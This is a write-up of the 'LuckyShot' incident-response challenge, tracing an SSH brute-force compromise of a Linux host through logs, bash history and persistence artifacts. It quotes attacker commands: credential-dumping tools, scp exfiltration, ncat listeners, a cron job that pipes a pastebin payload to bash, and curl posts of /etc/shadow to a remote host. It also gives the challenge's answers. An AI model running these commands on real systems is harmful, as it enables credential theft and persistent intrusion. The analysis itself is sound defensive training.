LuckyShot

Scenario

The IT Manager of Techniqua-Solutions Corp. is responsible for managing the company’s infrastructure. As part of his daily work, he frequently accesses company servers and workstations. One morning, the IT Manager discovered that several critical company files were missing, while others had been modified or replaced with unfamiliar ones. Concerned about a potential breach, he reported the issue to the security team.

As an incident response analyst, your task is to investigate the case. You have been provided with a forensic image of the IT Manager’s machine.

We are provided with LuckyShot.zip, it contains:

              tree -L 2 LuckyShot
# LuckyShot
# ├── bodyfile
# │   └── bodyfile.txt
# ├── hash_executables
# │   ├── hash_executables.md5
# │   └── hash_executables.sha1
# ├── live_response
# │   ├── hardware
# │   ├── network
# │   ├── packages
# │   ├── process
# │   ├── storage
# │   └── system
# └── [root]
#     ├── etc
#     ├── home
#     ├── lib
#     ├── root
#     ├── run
#     ├── snap
#     ├── tmp
#     ├── usr
#     └── var

            

Let's break down what we see:

A body file contians information about all the files on the system including dated information useful for timeline analysis.
Hash executable contains md5 and sha1 hashes for all executable files on the system.
A detailed tree of log files for various components, including hardware, individual process activity, etc.
root is the actual system image.

From this let's start by looking at the different users on the system, from live_response/system/env.txt we see:

SUDO_COMMAND=./uac -p ir_triage /home/administrator/Desktop/

The collected data comes from Unix-like Artifacts Collector (UAC).

Tasks

Task 1

Looking at [root]/home, we have administrator and Regev (which doesn't have anything useful).

administrator is a good start, let's see if we have /home/administrator/.bash_history or similar:

              # ...
sudo apt install git -y
cd /tmp/
git clone https://github.com/alessandroz/lazagne.git
cd lazagne/linux
ls
sudo apt install python3-pip -y
pip3 install --user -r ../requirements.txt --break-system-packages
sudo apt install libsqlite3-dev -y
python3 laZagne.py all
sudo apt install curl -y
curl -o /tmp/mimipenguin.sh https://raw.githubusercontent.com/huntergregal/mimipenguin/master/mimipenguin.sh
chmod +x /tmp/mimipenguin.sh
which strings
cd /Documents
ls -la
scp Passwords_Backup.txt Server_Credentials.txt kali@192.168.161.198:~/Desktop/
cd /tmp/
chmod +x sys_monitor.sh
sudo ./sys_monitor.sh
cd ~/Documents
firefox
sudo systemctl status ssh
lsblk
fdisk -l
htop
ps aux
exit

            

Interesting, the files were subsequently deleted by the attacker we don't see then in the bodyfile.txt, let's look at the hash_executables for any outlier:

              45c5554367d3a460e8609d28e926e1d7  /home/administrator/Desktop/Telegram/Updater
21c2afdf2725a226a06a0d7e220fddbd  /home/administrator/tmp/sys_monitor.sh

Let's look for these on the system:

              mactime -b bodyfile.txt -h -y | grep -E "Updater|sys_monitor"
# 2025-01-27T20:39:49Z 10615032 m... -rwxr-xr-x 1000     1000     1835174  /home/administrator/Downloads/tsetup.5.10 (2).7/Telegram/Updater
#                      10615032 m... -rwxr-xr-x 1000     1000     1838104  /home/administrator/Desktop/Telegram/Updater
#                      10615032 .a.b -rwxr-xr-x 1000     1000     1838104  /home/administrator/Desktop/Telegram/Updater
#                      10615032 ..c. -rwxr-xr-x 1000     1000     1838104  /home/administrator/Desktop/Telegram/Updater
# 2025-02-09T19:07:32Z 10615032 .a.b -rwxr-xr-x 1000     1000     1835174  /home/administrator/Downloads/tsetup.5.10 (2).7/Telegram/Updater
# 2025-02-09T19:07:33Z 10615032 ..c. -rwxr-xr-x 1000     1000     1835174  /home/administrator/Downloads/tsetup.5.10 (2).7/Telegram/Updater

            

Looking at [root]/home/administrator again we see .ssh, let's look at the linux auth.log for any suspicious activity:

              2025-02-10T19:40:08.242696+02:00 LuckyShot sshd[13349]: Failed password for invalid user Administrator from 192[.]168[.]161[.]198 port 60512 ssh2
2025-02-10T19:40:08.283076+02:00 LuckyShot sshd[13351]: Failed password for invalid user Administrator from 192[.]168[.]161[.]198 port 60526 ssh2
2025-02-10T19:40:08.287937+02:00 LuckyShot sshd[13352]: Failed password for invalid user Administrator from 192[.]168[.]161[.]198 port 60532 ssh2
2025-02-10T19:40:08.307888+02:00 LuckyShot sshd[13355]: Failed password for invalid user Administrator from 192[.]168[.]161[.]198 port 60544 ssh2
2025-02-10T19:40:08.319122+02:00 LuckyShot sshd[13349]: Connection closed by invalid user Administrator 192[.]168[.]161[.]198 port 60512 [preauth]
2025-02-10T19:40:08.335000+02:00 LuckyShot sshd[13357]: Failed password for invalid user Administrator from 192[.]168[.]161[.]198 port 60552 ssh2
2025-02-10T19:40:08.359732+02:00 LuckyShot sshd[13351]: Connection closed by invalid user Administrator 192[.]168[.]161[.]198 port 60526 [preauth]
2025-02-10T19:40:08.364293+02:00 LuckyShot sshd[13352]: Connection closed by invalid user Administrator 192[.]168[.]161[.]198 port 60532 [preauth]
2025-02-10T19:40:08.383775+02:00 LuckyShot sshd[13355]: Connection closed by invalid user Administrator 192[.]168[.]161[.]198 port 60544 [preauth]
2025-02-10T19:40:08.412157+02:00 LuckyShot sshd[13357]: Connection closed by invalid user Administrator 192[.]168[.]161[.]198 port 60552 [preauth]
2025-02-10T19:40:08.512086+02:00 LuckyShot sshd[13359]: Failed password for invalid user Administrator from 192[.]168[.]161[.]198 port 60562 ssh2
2025-02-10T19:40:08.541970+02:00 LuckyShot sshd[13343]: Failed password for invalid user Administrator from 192[.]168[.]161[.]198 port 60482 ssh2
2025-02-10T19:40:08.550658+02:00 LuckyShot sshd[13345]: Failed password for invalid user Administrator from 192[.]168[.]161[.]198 port 60490 ssh2
2025-02-10T19:40:08.563604+02:00 LuckyShot sshd[13347]: Failed password for invalid user Administrator from 192[.]168[.]161[.]198 port 60500 ssh2
2025-02-10T19:40:08.588631+02:00 LuckyShot sshd[13359]: Connection closed by invalid user Administrator 192[.]168[.]161[.]198 port 60562 [preauth]
2025-02-10T19:40:09.222237+02:00 LuckyShot sshd[13361]: Failed password for invalid user Administrator from 192[.]168[.]161[.]198 port 60566 ssh2
2025-02-10T19:40:09.284529+02:00 LuckyShot sshd[13363]: Failed password for invalid user Administrator from 192[.]168[.]161[.]198 port 60580 ssh2
2025-02-10T19:40:09.495200+02:00 LuckyShot sshd[13361]: Connection closed by invalid user Administrator 192[.]168[.]161[.]198 port 60566 [preauth]
2025-02-10T19:40:09.560134+02:00 LuckyShot sshd[13363]: Connection closed by invalid user Administrator 192[.]168[.]161[.]198 port 60580 [preauth]
2025-02-10T19:40:09.581480+02:00 LuckyShot sshd[13343]: Connection closed by invalid user Administrator 192[.]168[.]161[.]198 port 60482 [preauth]
2025-02-10T19:40:09.591420+02:00 LuckyShot sshd[13345]: Connection closed by invalid user Administrator 192[.]168[.]161[.]198 port 60490 [preauth]
2025-02-10T19:40:09.606439+02:00 LuckyShot sshd[13347]: Connection closed by invalid user Administrator 192[.]168[.]161[.]198 port 60500 [preauth]

            

The attacker tried a lot of users:

              cat auth.log | grep "Failed password for invalid user" | cut -d' ' -f9 | sort | uniq -c | sort -n
#      75 ubuntu
#      76 default
#      79 admin
#      87 Administrator
cat auth.log | grep "Failed password for root" | cut -d' ' -f7 | sort | uniq -c | sort -n
#      75 root

            

What method did the attacker use to gain access to the system?

brute force

Task 2

Let's find the very first attempted brute force:

              cat auth.log | grep "Failed password for" | head -n 3
# 2025-02-10T19:38:20.457698+02:00 LuckyShot sshd[12985]: Failed password for root from 192[.]168[.]161[.]198 port 45784 ssh2
# 2025-02-10T19:38:20.463242+02:00 LuckyShot sshd[12993]: Failed password for root from 192[.]168[.]161[.]198 port 45820 ssh2
# 2025-02-10T19:38:20.467250+02:00 LuckyShot sshd[12984]: Failed password for root from 192[.]168[.]161[.]198 port 45782 ssh2

            

Now let's locate the very first mention of "Accepted password for" after february 10th 2025 at 19:38:20:

              cat auth.log | grep "Accepted password for" | head -n 3
# 2025-02-10T19:39:03.232692+02:00 LuckyShot sshd[13105]: Accepted password for administrator from 192[.]168[.]161[.]198 port 46160 ssh2
# 2025-02-10T19:41:10.248386+02:00 LuckyShot sshd[13613]: Accepted password for administrator from 192[.]168[.]161[.]198 port 42878 ssh2
# 2025-02-10T20:08:12.256311+02:00 LuckyShot sshd[16413]: Accepted password for administrator from 192[.]168[.]161[.]198 port 56302 ssh2

            

At what time did the attacker successfully log in for the first time?

2025-02-10 19:39:03

Task 3

Which user account was compromised by the attacker?

administrator

Task 4

This one is a bit weird, it appears higher in the bash history though this doesn't really make any sense in the timeline. There might be some discrepancy regarding the UTC+2 timezone

What command was executed by the attacker to check user privileges?

groups administrator

Task 5

We saw the bash history previously.

What was the first tool the attacker downloaded to extract stored credentials from the system?

LaZagne

Task 6

The attacker located sensitive files on the compromised system and transferred them to a remote machine. Which command-line tool was used for this exfiltration?

scp

Task 7

What IP did the attacker exfiltrate the files to?

192.168.161.198

Task 8

The attacker continued their exploitation and executed a malicious script on the victim machine. What is the name of the script?

sys_monitor.sh

Task 9

What is the SHA1 hash of the malware?

3ae5dea716a4f7bfb18046bfba0553ea01021c75

Task 10

Let's look for any signs of persistance, for example let's monitor any new services created, we can check the bodyfile, if we test our theory of the UTC+2 discrepancy we get results:

              mactime -b bodyfile.txt -h -y -d 2025-02-10T17:39:03..2025-02-10T20:00:00 | grep ".service\"$" | grep -v ' -> '
# ...
# 2025-02-10T18:11:19Z,180,...b,-rw-r--r--,0,0,7605073,"/etc/systemd/system/systemd-networkm.service"
# 2025-02-10T18:22:04Z,180,mac.,-rw-r--r--,0,0,7605073,"/etc/systemd/system/systemd-networkm.service"

            

              cat etc/systemd/system/systemd-networkm.service
# [Unit]
# Description=System Network Management
# After=network.target
# 
# [Service]
# ExecStart=/bin/bash /tmp/sys_monitor.sh
# Restart=always
# User=root
# 
# [Install]
# WantedBy=multi-user.target

            

The malware installed a component that pretends to be part of system network management but is actually running with root privileges. What is the name of the component?

systemd-networkm.service

Task 11

Looking at the /root/ files we find that there's persistance there as well, the attacked added:

              tail -n 1 .bashrc .profile
# ==> .bashrc <==
# ncat -lvp 7575 &
# 
# ==> .profile <==
# ncat -lvp 9000 &

            

The attacker modified several startup configuration files, each spawning a network listener on a different port at login. What is the name of the file that starts the listener on the lowest port number?

.bashrc

Task 12

Since we're in the /root/ directory, there's a .ssh/ let's verify the contents:

              cat .ssh/authorized_keys
# ssh-rsa <TRIM> kali@kali

What is the username and hostname associated with the attacker?

kali@kali

Task 13

The attacker created a user for persistence, what is the name of the created user?

Regev

Task 14

We can either look at the auth.log but we can also look at the bodyfile, the entire user creation process should be pretty fast so the timestamp of the /home/Regev directory should match:

              mactime -b bodyfile.txt -h -y -d | grep "/home/Regev"
# ...
# 2025-02-11T07:33:36Z,4096,.a..,drwxr-x---,1001,1001,1839307,"/home/Regev"

            

We cn then add 2 hours to compensate.

At what exact timestamp was the new user created on the system?

2025-02-10T19:40:08Z

Task 15

Looking at etc/cron.d/syscheck we find persistance:

              /1 * * * root command -v curl >/dev/null 2>&1 || (apt update && apt install -y curl) && curl -fsSL https://pastebin.com/raw/SAuEez0S | rev | base64 -d | bash

            

The malware set up an automated process to fetch and execute a remote payload from a legitimate web service. What is the full command responsible for retrieving this payload?

command -v curl >/dev/null 2>&1 || (apt update && apt install -y curl) && curl -fsSL https://pastebin.com/raw/SAuEez0S | rev | base64 -d | bash

Task 16

If we decode the payload we get:

              curl -fsSL https://pastebin.com/raw/SAuEez0S | rev | base64 -d
# base64 /etc/shadow | curl -X POST -d @- hXXp[://]192[.]168[.]161[.]198/steal.php
# base64 /etc/passwd | curl -X POST -d @- hXXp[://]192[.]168[.]161[.]198/steal.php

            

The payload was used to extract more sensitive files. What was the command ran to extract the more sensitive file?

base64 /etc/shadow | curl -X POST -d @- http://192[.]168[.]161[.]198/steal.php (Without the fang)

← BACK